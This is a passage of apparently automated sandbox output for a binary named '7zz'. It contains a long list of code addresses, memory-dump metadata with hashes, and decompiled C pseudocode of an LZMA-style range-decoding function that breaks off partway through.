                                                                                  0x00460ea9
                                                                                  0x00460ead
                                                                                  0x00460eb3
                                                                                  0x00460eb9
                                                                                  0x00460ec5
                                                                                  0x00460ec9
                                                                                  0x00460ecd
                                                                                  0x00460ed4
                                                                                  0x00460ed6
                                                                                  0x00460ed8
                                                                                  0x00460edd
                                                                                  0x00460edf
                                                                                  0x00460ee6
                                                                                  0x00460ef0
                                                                                  0x00460ef2
                                                                                  0x00460ef2
                                                                                  0x00460ef9
                                                                                  0x00460efa
                                                                                  0x00460efd
                                                                                  0x00460f00
                                                                                  0x00460f0d
                                                                                  0x00460f0f
                                                                                  0x00460f12
                                                                                  0x00460f12
                                                                                  0x00460f1c
                                                                                  0x00460f20
                                                                                  0x00460f20
                                                                                  0x00460f23
                                                                                  0x00460f25
                                                                                  0x00460f2b
                                                                                  0x00460f2d
                                                                                  0x00460f2f
                                                                                  0x00460f2f
                                                                                  0x00460f35
                                                                                  0x00460f39
                                                                                  0x00460f53
                                                                                  0x00460f58
                                                                                  0x00460f5a
                                                                                  0x00460f61
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460f7d
                                                                                  0x00460f88
                                                                                  0x00460f9c
                                                                                  0x00460fbf
                                                                                  0x00460fc8
                                                                                  0x00460fcf
                                                                                  0x00460fea
                                                                                  0x0046100f
                                                                                  0x00461017
                                                                                  0x00461026
                                                                                  0x00461028
                                                                                  0x00461046
                                                                                  0x00461060
                                                                                  0x00461068
                                                                                  0x0046106c
                                                                                  0x00461070
                                                                                  0x00461076
                                                                                  0x004610b0
                                                                                  0x004610f1
                                                                                  0x004610f3
                                                                                  0x004610fc
                                                                                  0x00461103
                                                                                  0x00461105
                                                                                  0x0046110b
                                                                                  0x0046110f
                                                                                  0x00461117
                                                                                  0x00461121
                                                                                  0x00461128
                                                                                  0x0046112b
                                                                                  0x0046112e
                                                                                  0x0046112e
                                                                                  0x00000000
                                                                                  0x00461103
                                                                                  0x00461084
                                                                                  0x00461088
                                                                                  0x0046108c
                                                                                  0x00461090
                                                                                  0x00461094
                                                                                  0x004610a0
                                                                                  0x004610a0
                                                                                  0x004610a3
                                                                                  0x004610a4
                                                                                  0x004610a4
                                                                                  0x004610ac
                                                                                  0x00000000
                                                                                  0x00460f3b
                                                                                  0x00460f3f
                                                                                  0x00460f42
                                                                                  0x00460f44
                                                                                  0x00460f4b
                                                                                  0x00460f4c
                                                                                  0x00460f51
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460f51
                                                                                  0x00000000
                                                                                  0x00460f44
                                                                                  0x00460f39
                                                                                  0x00460e69
                                                                                  0x00460e6d
                                                                                  0x00460e74
                                                                                  0x00460e80
                                                                                  0x00460e80
                                                                                  0x00460e83
                                                                                  0x00460e84
                                                                                  0x00460e84
                                                                                  0x00000000
                                                                                  0x00460e80
                                                                                  0x00460e41
                                                                                  0x00460e44
                                                                                  0x00460e46
                                                                                  0x00460e4d
                                                                                  0x00460e4e
                                                                                  0x00460e51
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460e51
                                                                                  0x00000000
                                                                                  0x00461131
                                                                                  0x00461138
                                                                                  0x00461139
                                                                                  0x00461143
                                                                                  0x00460e00
                                                                                  0x00460e00
                                                                                  0x00460e00
                                                                                  0x00460e13
                                                                                  0x00460e14
                                                                                  0x00460e1a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460e1a
                                                                                  0x00460e00
                                                                                  0x00461149
                                                                                  0x0046114d
                                                                                  0x00461153
                                                                                  0x0046117b
                                                                                  0x0046117b
                                                                                  0x00461181
                                                                                  0x00461560
                                                                                  0x00461560
                                                                                  0x00461564
                                                                                  0x00461565
                                                                                  0x0046156d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460877
                                                                                  0x0046087c
                                                                                  0x00460886
                                                                                  0x00461579
                                                                                  0x0046157f
                                                                                  0x00461585
                                                                                  0x0046159f
                                                                                  0x0046088c
                                                                                  0x0046088c
                                                                                  0x00460890
                                                                                  0x0046089a
                                                                                  0x0046089d
                                                                                  0x004608a4
                                                                                  0x004608ab
                                                                                  0x004608af
                                                                                  0x00460910
                                                                                  0x004608b1
                                                                                  0x004608b1
                                                                                  0x004608b9
                                                                                  0x00460902
                                                                                  0x004608bb
                                                                                  0x004608cd
                                                                                  0x004608d4
                                                                                  0x004608ed
                                                                                  0x004608d6
                                                                                  0x004608dd
                                                                                  0x004608dd
                                                                                  0x004608d4
                                                                                  0x004608b9
                                                                                  0x0046091a
                                                                                  0x00460947
                                                                                  0x0046096e
                                                                                  0x00460974
                                                                                  0x0046097e
                                                                                  0x00460994
                                                                                  0x0046099b
                                                                                  0x00000000
                                                                                  0x0046099b
                                                                                  0x00460987
                                                                                  0x0046098b
                                                                                  0x00000000
                                                                                  0x00460952
                                                                                  0x00460952
                                                                                  0x00460958
                                                                                  0x0046095e
                                                                                  0x00460965
                                                                                  0x004609a2
                                                                                  0x004609a2
                                                                                  0x004609a6
                                                                                  0x004609ab
                                                                                  0x004609b5
                                                                                  0x004609f7
                                                                                  0x004609fe
                                                                                  0x00460a05
                                                                                  0x00460a09
                                                                                  0x00000000
                                                                                  0x00460a09
                                                                                  0x004609bb
                                                                                  0x004609bf
                                                                                  0x004609c6
                                                                                  0x004609de
                                                                                  0x004609ed
                                                                                  0x004609ed
                                                                                  0x00000000
                                                                                  0x004609ed
                                                                                  0x004609d7
                                                                                  0x004609d7
                                                                                  0x004609dc
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004609dc
                                                                                  0x0046091c
                                                                                  0x00460923
                                                                                  0x0046093c
                                                                                  0x00460925
                                                                                  0x0046092c
                                                                                  0x0046092c
                                                                                  0x00460a0d
                                                                                  0x00460a19
                                                                                  0x00460a1d
                                                                                  0x00460a27
                                                                                  0x00460a33
                                                                                  0x00460a39
                                                                                  0x00460a3f
                                                                                  0x00460a4b
                                                                                  0x00460a4f
                                                                                  0x00460a59
                                                                                  0x00460a59
                                                                                  0x00460a5e
                                                                                  0x00460a67
                                                                                  0x00460a6f
                                                                                  0x00460a73
                                                                                  0x00460a77
                                                                                  0x00460a80
                                                                                  0x00460a88
                                                                                  0x00460a8f
                                                                                  0x00460a91
                                                                                  0x00460aab
                                                                                  0x00460ab3
                                                                                  0x00460ace
                                                                                  0x00460ae2
                                                                                  0x00460aeb
                                                                                  0x00460b10
                                                                                  0x00460b18
                                                                                  0x00460b20
                                                                                  0x00460b42
                                                                                  0x00460b49
                                                                                  0x00460b4b
                                                                                  0x00460b4f
                                                                                  0x00460b56
                                                                                  0x00460b58
                                                                                  0x00460b5c
                                                                                  0x00460b5e
                                                                                  0x00460b68
                                                                                  0x00460b6a
                                                                                  0x00460b74
                                                                                  0x00460b7a
                                                                                  0x00460b84
                                                                                  0x00460b8e
                                                                                  0x00460b8e
                                                                                  0x00460b96
                                                                                  0x00460bb9
                                                                                  0x00460bcd
                                                                                  0x00460bd1
                                                                                  0x00460bd3
                                                                                  0x00460bde
                                                                                  0x00460be6
                                                                                  0x00460c1d
                                                                                  0x00460c25
                                                                                  0x00460c27
                                                                                  0x00460c2f
                                                                                  0x00460c35
                                                                                  0x00460c3b
                                                                                  0x00460c41
                                                                                  0x00460c41
                                                                                  0x00460c25
                                                                                  0x00460c49
                                                                                  0x00460c54
                                                                                  0x00460c56
                                                                                  0x00460c5c
                                                                                  0x00460c5e
                                                                                  0x00460c60
                                                                                  0x00460c60
                                                                                  0x00460c67
                                                                                  0x00000000
                                                                                  0x00460c6d
                                                                                  0x00460c6d
                                                                                  0x00460c73
                                                                                  0x00460c79
                                                                                  0x00460c7b
                                                                                  0x00460c7b
                                                                                  0x00460c84
                                                                                  0x00460de3
                                                                                  0x00460de3
                                                                                  0x00460deb
                                                                                  0x00000000
                                                                                  0x00460c9b
                                                                                  0x00460c9b
                                                                                  0x00460c9e
                                                                                  0x00460ca0
                                                                                  0x00460ca0
                                                                                  0x00460ca2
                                                                                  0x00460ca9
                                                                                  0x00460cc5
                                                                                  0x00460cc5
                                                                                  0x00460cc5
                                                                                  0x00460cc8
                                                                                  0x00460cd2
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460cdc
                                                                                  0x00460cf7
                                                                                  0x00460d02
                                                                                  0x00460d33
                                                                                  0x00460d37
                                                                                  0x00460d3b
                                                                                  0x00460d3f
                                                                                  0x00460d45
                                                                                  0x00460d75
                                                                                  0x00460db6
                                                                                  0x00460db8
                                                                                  0x00460dc1
                                                                                  0x00460dc8
                                                                                  0x00460dcf
                                                                                  0x00460dd3
                                                                                  0x00460dd6
                                                                                  0x00460dd9
                                                                                  0x00460de0
                                                                                  0x00460de0
                                                                                  0x00000000
                                                                                  0x00460dc8
                                                                                  0x00460d53
                                                                                  0x00460d59
                                                                                  0x00460d5d
                                                                                  0x00460d61
                                                                                  0x00460d65
                                                                                  0x00460d65
                                                                                  0x00460d68
                                                                                  0x00460d69
                                                                                  0x00460d69
                                                                                  0x00460d71
                                                                                  0x00000000
                                                                                  0x00460cab
                                                                                  0x00460cab
                                                                                  0x00460cb3
                                                                                  0x00460cb6
                                                                                  0x00460cb8
                                                                                  0x00460cbf
                                                                                  0x00460cc0
                                                                                  0x00460cc3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00460cc3
                                                                                  0x00000000
                                                                                  0x00460cb8
                                                                                  0x00460ca9
                                                                                  0x00460c84
                                                                                  0x00460c67
                                                                                  0x00460b01
                                                                                  0x00000000
                                                                                  0x00460b01
                                                                                  0x0046091a
                                                                                  0x00460886
                                                                                  0x00000000
                                                                                  0x00461573
                                                                                  0x004611a5
                                                                                  0x004611a9
                                                                                  0x004611ac
                                                                                  0x004611b2
                                                                                  0x004611dc
                                                                                  0x004611dc
                                                                                  0x004611de
                                                                                  0x004611eb
                                                                                  0x00461203
                                                                                  0x0046120a
                                                                                  0x00461227
                                                                                  0x0046122a
                                                                                  0x00461239
                                                                                  0x00461250
                                                                                  0x0046125f
                                                                                  0x00461266
                                                                                  0x0046126c
                                                                                  0x00461276
                                                                                  0x0046127a
                                                                                  0x0046127e
                                                                                  0x00461281
                                                                                  0x00461283
                                                                                  0x00461283
                                                                                  0x0046128d
                                                                                  0x004612b7
                                                                                  0x0046128f
                                                                                  0x00461294
                                                                                  0x00461294
                                                                                  0x004612b9
                                                                                  0x004612c0
                                                                                  0x004612c2
                                                                                  0x004612cc
                                                                                  0x004612cf
                                                                                  0x004612d1
                                                                                  0x004612d1
                                                                                  0x004612e9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004612ef
                                                                                  0x004612f3
                                                                                  0x004612ff
                                                                                  0x00461301
                                                                                  0x00461302
                                                                                  0x00461306
                                                                                  0x00461308
                                                                                  0x00461308
                                                                                  0x0046130c
                                                                                  0x00461335
                                                                                  0x0046133d
                                                                                  0x0046133f
                                                                                  0x00461346
                                                                                  0x00461504
                                                                                  0x0046150b
                                                                                  0x0046150e
                                                                                  0x00461519
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0046151b
                                                                                  0x00461522
                                                                                  0x0046152b
                                                                                  0x0046154e
                                                                                  0x0046154e
                                                                                  0x00000000
                                                                                  0x0046152b
                                                                                  0x0046135f
                                                                                  0x00461363
                                                                                  0x00461367
                                                                                  0x004613ae
                                                                                  0x004613b7
                                                                                  0x004613be
                                                                                  0x004613de
                                                                                  0x004613e9
                                                                                  0x004613fc
                                                                                  0x004613fe
                                                                                  0x0046142e
                                                                                  0x00461438
                                                                                  0x0046143c
                                                                                  0x00461440
                                                                                  0x00461446
                                                                                  0x00461480
                                                                                  0x004614b7
                                                                                  0x004614c5
                                                                                  0x004614c7
                                                                                  0x004614d0
                                                                                  0x004614d7
                                                                                  0x004614d9
                                                                                  0x004614dd
                                                                                  0x004614e2
                                                                                  0x004614e9
                                                                                  0x004614f4
                                                                                  0x004614fb
                                                                                  0x004614fe
                                                                                  0x00461501
                                                                                  0x00461501
                                                                                  0x00000000
                                                                                  0x004614d7
                                                                                  0x00461454
                                                                                  0x00461458
                                                                                  0x0046145c
                                                                                  0x00461460
                                                                                  0x00461464
                                                                                  0x00461470
                                                                                  0x00461470
                                                                                  0x00461473
                                                                                  0x00461474
                                                                                  0x00461474
                                                                                  0x0046147c
                                                                                  0x00000000
                                                                                  0x0046130e
                                                                                  0x00461312
                                                                                  0x00461314
                                                                                  0x00461317
                                                                                  0x00461324
                                                                                  0x0046132b
                                                                                  0x0046132c
                                                                                  0x0046132f
                                                                                  0x00461320
                                                                                  0x00000000
                                                                                  0x00461320
                                                                                  0x00000000
                                                                                  0x0046132f
                                                                                  0x00461331
                                                                                  0x00000000
                                                                                  0x00461331
                                                                                  0x00461552
                                                                                  0x00461552
                                                                                  0x00461557
                                                                                  0x0046155a
                                                                                  0x0046126c
                                                                                  0x00461276
                                                                                  0x0046127a
                                                                                  0x0046127e
                                                                                  0x00461281
                                                                                  0x00461283
                                                                                  0x00461283
                                                                                  0x0046128d
                                                                                  0x004612b7
                                                                                  0x0046128f
                                                                                  0x00461294
                                                                                  0x00461294
                                                                                  0x004612b9
                                                                                  0x004612c0
                                                                                  0x004612c2
                                                                                  0x004612cc
                                                                                  0x004612cf
                                                                                  0x004612d1
                                                                                  0x004612d1
                                                                                  0x004612e9
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004612e9
                                                                                  0x00461266
                                                                                  0x004611f0
                                                                                  0x004611f0
                                                                                  0x004611f3
                                                                                  0x004611fc
                                                                                  0x00000000
                                                                                  0x004611fc
                                                                                  0x004611b9
                                                                                  0x004611bd
                                                                                  0x004611c4
                                                                                  0x004611d0
                                                                                  0x004611d0
                                                                                  0x004611d3
                                                                                  0x004611d4
                                                                                  0x004611d4
                                                                                  0x00000000
                                                                                  0x004611d0
                                                                                  0x00461155
                                                                                  0x00461157
                                                                                  0x0046115f
                                                                                  0x0046116d
                                                                                  0x0046116d
                                                                                  0x00461177
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00461161
                                                                                  0x00461161
                                                                                  0x00461161
                                                                                  0x00461164
                                                                                  0x00000000
                                                                                  0x00461161

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
                                                                                  • Instruction ID: 7147a41103b82fee1bf31e8f6f8380e5711e53636797ff3198694e8fe18354a8
                                                                                  • Opcode Fuzzy Hash: 1f8fa4cdc9228aaa3a07012a4c32e0885d6804b09010c7afb976018d4f09c0f3
                                                                                  • Instruction Fuzzy Hash: D332C1716082458FCB19CF18D4906AEB7E2FFD9308F148A2DE88A97310E739E955CF42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 0045E0C0 Relevance: .5, Instructions: 481COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 100%
                                                                                  			E0045E0C0(void* __eax, signed int* __ecx) {
				intOrPtr _t149;
				unsigned int _t153;
				signed int _t157;
				signed int _t158;
				intOrPtr _t159;
				signed int _t160;
				signed int _t161;
				signed char* _t162;
				signed int _t164;
				intOrPtr _t167;
				signed int _t168;
				signed char* _t169;
				signed int _t171;
				signed char* _t179;
				signed int _t190;
				signed int _t192;
				signed int _t196;
				signed char* _t197;
				signed char* _t199;
				signed int _t204;
				signed short* _t205;
				void* _t206;
				signed int _t207;
				signed int _t215;
				signed int _t216;
				signed char* _t225;
				signed int _t228;
				signed int _t232;
				signed int _t235;
				signed int _t238;
				signed int _t241;
				signed int _t244;
				signed int _t247;
				signed char _t251;
				void* _t252;
				signed int _t265;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t278;
				signed char* _t279;
				signed int _t281;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				unsigned int _t291;
				signed int* _t292;
				intOrPtr _t293;
				signed char* _t294;
				signed short* _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				signed int _t301;
				signed int _t310;
				signed int _t314;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed char* _t344;
				void* _t351;

				_t292 = __ecx;
				_t340 =  *(__ecx + 0x34);
				_t283 =  *(__ecx + 0x1c);
				_t321 =  *(__ecx + 0x20);
				_t149 =  *((intOrPtr*)(__ecx + 0x10));
				 *(_t351 + 0x10) =  &(( *(_t351 + 0x28))[__eax]);
				 *((intOrPtr*)(_t351 + 0x14)) = _t149;
				_t204 = (0x00000001 <<  *(__ecx + 8)) - 0x00000001 &  *(__ecx + 0x2c);
				 *(_t351 + 0x18) =  *(_t149 + ((_t340 << 4) + 1) * 2) & 0x0000ffff;
				if(_t283 >= 0x1000000) {
					L4:
					_t153 = (_t283 >> 0xb) *  *(_t351 + 0x18);
					if(_t321 >= _t153) {
						_t293 =  *((intOrPtr*)(_t351 + 0x14));
						_t225 =  *(_t351 + 0x28);
						_t284 = _t283 - _t153;
						_t322 = _t321 - _t153;
						 *(_t351 + 0x18) =  *(_t293 + 0x180 + _t340 * 2) & 0x0000ffff;
						if(_t284 >= 0x1000000) {
							L39:
							_t157 = (_t284 >> 0xb) *  *(_t351 + 0x18);
							if(_t322 >= _t157) {
								_t285 = _t284 - _t157;
								_t323 = _t322 - _t157;
								_t158 =  *(_t293 + 0x198 + _t340 * 2) & 0x0000ffff;
								 *(_t351 + 0x1c) = 3;
								if(_t285 >= 0x1000000) {
									L44:
									_t228 = (_t285 >> 0xb) * _t158;
									_t159 =  *((intOrPtr*)(_t351 + 0x14));
									if(_t323 >= _t228) {
										_t294 =  *(_t351 + 0x28);
										_t286 = _t285 - _t228;
										_t324 = _t323 - _t228;
										 *(_t351 + 0x18) =  *(_t159 + 0x1b0 + _t340 * 2) & 0x0000ffff;
										if(_t286 >= 0x1000000) {
											L55:
											_t232 = (_t286 >> 0xb) *  *(_t351 + 0x18);
											if(_t324 >= _t232) {
												_t160 =  *(_t159 + 0x1c8 + _t340 * 2) & 0x0000ffff;
												_t287 = _t286 - _t232;
												_t323 = _t324 - _t232;
												if(_t287 >= 0x1000000) {
													L60:
													_t235 = (_t287 >> 0xb) * _t160;
													if(_t323 >= _t235) {
														goto L62;
													} else {
														_t288 = _t235;
													}
													goto L63;
												} else {
													if(_t294 >=  *(_t351 + 0x10)) {
														goto L2;
													} else {
														_t287 = _t287 << 8;
														_t323 = _t323 << 0x00000008 |  *_t294 & 0x000000ff;
														 *(_t351 + 0x28) =  &(_t294[1]);
														goto L60;
													}
												}
											} else {
												_t288 = _t232;
												goto L63;
											}
										} else {
											if(_t294 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t286 = _t286 << 8;
												_t324 = _t324 << 0x00000008 |  *_t294 & 0x000000ff;
												_t294 =  &(_t294[1]);
												 *(_t351 + 0x28) = _t294;
												goto L55;
											}
										}
									} else {
										_t314 =  *(_t159 + ((_t340 + 0xf << 4) + _t204) * 2) & 0x0000ffff;
										_t179 =  *(_t351 + 0x28);
										_t287 = _t228;
										if(_t228 >= 0x1000000) {
											L48:
											_t235 = (_t287 >> 0xb) * _t314;
											if(_t323 >= _t235) {
												L62:
												_t288 = _t287 - _t235;
												_t323 = _t323 - _t235;
												L63:
												_t225 =  *(_t351 + 0x28);
												 *(_t351 + 0x20) = 0xc;
												_t296 =  *((intOrPtr*)(_t351 + 0x14)) + 0xa68;
												goto L64;
											} else {
												if(_t235 >= 0x1000000 || _t179 <  *(_t351 + 0x10)) {
													return 3;
												} else {
													goto L2;
												}
											}
										} else {
											if(_t179 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t287 = _t228 << 8;
												_t323 = _t323 << 0x00000008 |  *_t179 & 0x000000ff;
												_t179 =  &(_t179[1]);
												 *(_t351 + 0x28) = _t179;
												goto L48;
											}
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t285 = _t285 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L44;
									}
								}
							} else {
								_t288 = _t157;
								 *(_t351 + 0x20) = 0;
								_t296 = _t293 + 0x664;
								 *(_t351 + 0x1c) = 2;
								L64:
								_t161 =  *_t296 & 0x0000ffff;
								if(_t288 >= 0x1000000) {
									L67:
									_t238 = (_t288 >> 0xb) * _t161;
									_t162 =  *(_t351 + 0x28);
									if(_t323 >= _t238) {
										_t341 = _t296[1] & 0x0000ffff;
										_t289 = _t288 - _t238;
										_t325 = _t323 - _t238;
										if(_t289 >= 0x1000000) {
											L72:
											_t241 = (_t289 >> 0xb) * _t341;
											if(_t325 >= _t241) {
												_t290 = _t289 - _t241;
												_t325 = _t325 - _t241;
												_t205 =  &(_t296[0x102]);
												_t342 = 0x10;
												 *(_t351 + 0x18) = 0x100;
											} else {
												_t342 = 8;
												_t290 = _t241;
												_t205 = _t296 + 0x104 + (_t204 + _t204) * 8;
												 *(_t351 + 0x18) = 8;
											}
											goto L75;
										} else {
											if(_t162 >=  *(_t351 + 0x10)) {
												goto L2;
											} else {
												_t289 = _t289 << 8;
												_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
												_t162 =  &(_t162[1]);
												 *(_t351 + 0x28) = _t162;
												goto L72;
											}
										}
									} else {
										_t290 = _t238;
										_t205 = _t296 + 4 + (_t204 + _t204) * 8;
										_t342 = 0;
										 *(_t351 + 0x18) = 8;
										L75:
										_t297 = 1;
										L76:
										while(1) {
											if(_t290 >= 0x1000000) {
												L79:
												_t244 = (_t290 >> 0xb) * (_t205[_t297] & 0x0000ffff);
												if(_t325 >= _t244) {
													_t290 = _t290 - _t244;
													_t325 = _t325 - _t244;
													_t297 = _t297 + _t297 + 1;
												} else {
													_t290 = _t244;
													_t297 = _t297 + _t297;
												}
												_t164 =  *(_t351 + 0x18);
												if(_t297 >= _t164) {
													_t298 = _t297 + _t342 - _t164;
													if( *(_t351 + 0x20) >= 4) {
														goto L20;
													} else {
														if(_t298 >= 4) {
															_t298 = 3;
														}
														_t167 =  *((intOrPtr*)(_t351 + 0x14));
														_t344 =  *(_t351 + 0x28);
														_t128 = _t167 + 0x360; // 0x363
														_t206 = (_t298 << 7) + _t128;
														_t300 = 1;
														do {
															_t168 =  *(_t206 + _t300 * 2) & 0x0000ffff;
															if(_t290 >= 0x1000000) {
																goto L91;
															} else {
																if(_t344 >=  *(_t351 + 0x10)) {
																	goto L2;
																} else {
																	_t290 = _t290 << 8;
																	_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																	_t344 =  &(_t344[1]);
																	goto L91;
																}
															}
															goto L113;
															L91:
															_t247 = (_t290 >> 0xb) * _t168;
															if(_t325 >= _t247) {
																_t290 = _t290 - _t247;
																_t325 = _t325 - _t247;
																_t300 = _t300 + _t300 + 1;
															} else {
																_t290 = _t247;
																_t300 = _t300 + _t300;
															}
														} while (_t300 < 0x40);
														_t301 = _t300 - 0x40;
														if(_t301 < 4) {
															goto L21;
														} else {
															_t251 = (_t301 >> 1) - 1;
															if(_t301 >= 0xe) {
																_t169 =  *(_t351 + 0x10);
																_t252 = _t251 - 4;
																do {
																	if(_t290 >= 0x1000000) {
																		goto L102;
																	} else {
																		if(_t344 >= _t169) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L102;
																		}
																	}
																	goto L113;
																	L102:
																	_t290 = _t290 >> 1;
																	_t325 = _t325 - ((_t325 - _t290 >> 0x0000001f) - 0x00000001 & _t290);
																	_t252 = _t252 - 1;
																} while (_t252 != 0);
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x644;
																_t251 = 4;
																goto L104;
															} else {
																 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0x55e + (((_t301 & 0x00000001 | 0x00000002) << _t251) - _t301) * 2;
																L104:
																_t207 = 1;
																do {
																	_t171 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t207 * 2) & 0x0000ffff;
																	if(_t290 >= 0x1000000) {
																		goto L108;
																	} else {
																		if(_t344 >=  *(_t351 + 0x10)) {
																			goto L2;
																		} else {
																			_t290 = _t290 << 8;
																			_t325 = _t325 << 0x00000008 |  *_t344 & 0x000000ff;
																			_t344 =  &(_t344[1]);
																			goto L108;
																		}
																	}
																	goto L113;
																	L108:
																	_t310 = (_t290 >> 0xb) * _t171;
																	if(_t325 >= _t310) {
																		_t290 = _t290 - _t310;
																		_t325 = _t325 - _t310;
																		_t207 = _t207 + _t207 + 1;
																	} else {
																		_t290 = _t310;
																		_t207 = _t207 + _t207;
																	}
																	_t251 = _t251 - 1;
																} while (_t251 != 0);
																goto L21;
															}
														}
													}
												} else {
													_t162 =  *(_t351 + 0x28);
													continue;
												}
											} else {
												if(_t162 >=  *(_t351 + 0x10)) {
													goto L2;
												} else {
													_t290 = _t290 << 8;
													_t325 = _t325 << 0x00000008 |  *_t162 & 0x000000ff;
													 *(_t351 + 0x28) =  &(_t162[1]);
													goto L79;
												}
											}
											goto L113;
										}
									}
								} else {
									if(_t225 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t288 = _t288 << 8;
										_t323 = _t323 << 0x00000008 |  *_t225 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t225[1]);
										goto L67;
									}
								}
							}
						} else {
							if(_t225 >=  *(_t351 + 0x10)) {
								goto L2;
							} else {
								_t284 = _t284 << 8;
								_t322 = _t322 << 0x00000008 |  *_t225 & 0x000000ff;
								_t225 =  &(_t225[1]);
								 *(_t351 + 0x28) = _t225;
								goto L39;
							}
						}
					} else {
						_t291 = _t153;
						 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + 0xe6c;
						if(_t292[0xc] != 0 || _t292[0xb] != 0) {
							_t265 = _t292[9];
							if(_t265 == 0) {
								_t265 = _t292[0xa];
							}
							 *((intOrPtr*)(_t351 + 0x14)) =  *((intOrPtr*)(_t351 + 0x14)) + ((( *(_t292[5] + _t265 - 1) & 0x000000ff) >> 8 -  *_t292) + (((0x00000001 << _t292[1]) - 0x00000001 & _t292[0xb]) <<  *_t292)) * 0x600;
						}
						if(_t340 >= 7) {
							_t270 = _t292[9];
							_t215 = _t292[0xe];
							if(_t270 >= _t215) {
								_t190 = 0;
							} else {
								_t190 = _t292[0xa];
							}
							_t271 =  *(_t292[5] - _t215 + _t270 + _t190) & 0x000000ff;
							_t216 = 0x100;
							_t319 = 1;
							while(1) {
								_t272 = _t271 + _t271;
								_t192 = _t216 & _t272;
								 *(_t351 + 0x20) = _t272;
								 *(_t351 + 0x18) =  *( *((intOrPtr*)(_t351 + 0x14)) + (_t192 + _t319 + _t216) * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L31;
								}
								_t279 =  *(_t351 + 0x28);
								if(_t279 >=  *(_t351 + 0x10)) {
									goto L2;
								} else {
									_t291 = _t291 << 8;
									_t321 = _t321 << 0x00000008 |  *_t279 & 0x000000ff;
									 *(_t351 + 0x28) =  &(_t279[1]);
									goto L31;
								}
								goto L113;
								L31:
								_t278 = (_t291 >> 0xb) *  *(_t351 + 0x18);
								if(_t321 >= _t278) {
									_t290 = _t291 - _t278;
									_t321 = _t321 - _t278;
									_t319 = _t319 + _t319 + 1;
								} else {
									_t290 = _t278;
									_t319 = _t319 + _t319;
									_t192 =  !_t192;
								}
								_t216 = _t216 & _t192;
								if(_t319 >= 0x100) {
									goto L19;
								} else {
									_t271 =  *(_t351 + 0x20);
									continue;
								}
								goto L113;
							}
						} else {
							_t281 = 1;
							do {
								_t320 =  *( *((intOrPtr*)(_t351 + 0x14)) + _t281 * 2) & 0x0000ffff;
								if(_t291 >= 0x1000000) {
									goto L15;
								} else {
									_t197 =  *(_t351 + 0x28);
									if(_t197 >=  *(_t351 + 0x10)) {
										goto L2;
									} else {
										_t291 = _t291 << 8;
										_t321 = _t321 << 0x00000008 |  *_t197 & 0x000000ff;
										 *(_t351 + 0x28) =  &(_t197[1]);
										goto L15;
									}
